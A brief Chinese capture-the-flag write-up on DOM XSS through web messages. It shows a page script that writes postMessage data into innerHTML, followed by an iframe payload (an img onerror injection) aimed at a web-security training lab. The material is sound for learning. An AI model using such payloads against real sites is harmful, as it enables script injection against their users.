CTF-WEB: 利用Web消息造成DOM XSS

如果索引中有类似如下代码

js 复制代码
<!-- Ads to be inserted here -->
<div id='ads'>
</div>
<script>
    window.addEventListener('message', function(e) {
        document.getElementById('ads').innerHTML = e.data;
    });
</script>
  • 这行代码的作用是将接收到的消息内容(e.data)设置为 id'ads' 的元素的 HTML 内容

那么在受害者段执行如下代码会导致DOM污染

html 复制代码
<iframe src="https://YOUR-LAB-ID.web-security-academy.net/" onload="this.contentWindow.postMessage('<img src=1 onerror=print()>','*')">

参考

实验:使用 Web 消息的 DOM XSS |网络安全学院

相关推荐
儒道易行4 小时前
【攻防实战】Redis未授权RCE联动metasploit打穿三层内网(下)
网络安全
XH-hui11 小时前
【打靶日记】VulNyx 之 Lower6
linux·网络安全·vulnyx
NOVAnet202312 小时前
应对AI全球化部署挑战:南凌科技云连接服务实现算法模型全球稳定传输
网络·人工智能·科技·网络安全
王火火(DDoS CC防护)1 天前
游戏盾是如何保障游戏安全稳定的?
游戏·网络安全·ddos攻击·sdk游戏盾
XH-hui1 天前
【打靶日记】THL 之 Facultad
linux·网络安全·1024程序员节·thehackerlabs
希望奇迹很安静1 天前
DVWA靶场通关笔记
web安全·网络安全·ctf·文件上传
缘友一世2 天前
清除入侵痕迹(win&Linux&web)
网络安全·渗透测试·痕迹清除
帅次2 天前
系统分析师-信息安全-信息系统安全体系&数据安全与保密
安全·web安全·网络安全·系统安全·密码学·安全威胁分析·安全架构
Whoami!2 天前
⸢ 拾-Ⅰ⸥⤳ 威胁感知与响应建设方案:感知覆盖&威胁识别
网络安全·信息安全·态势感知·威胁处置
NOVAnet20232 天前
为迎战双十一,南凌科技发布「大促网络保障解决方案」,以确定性网络抵御不确定流量洪峰
网络·科技·安全·网络安全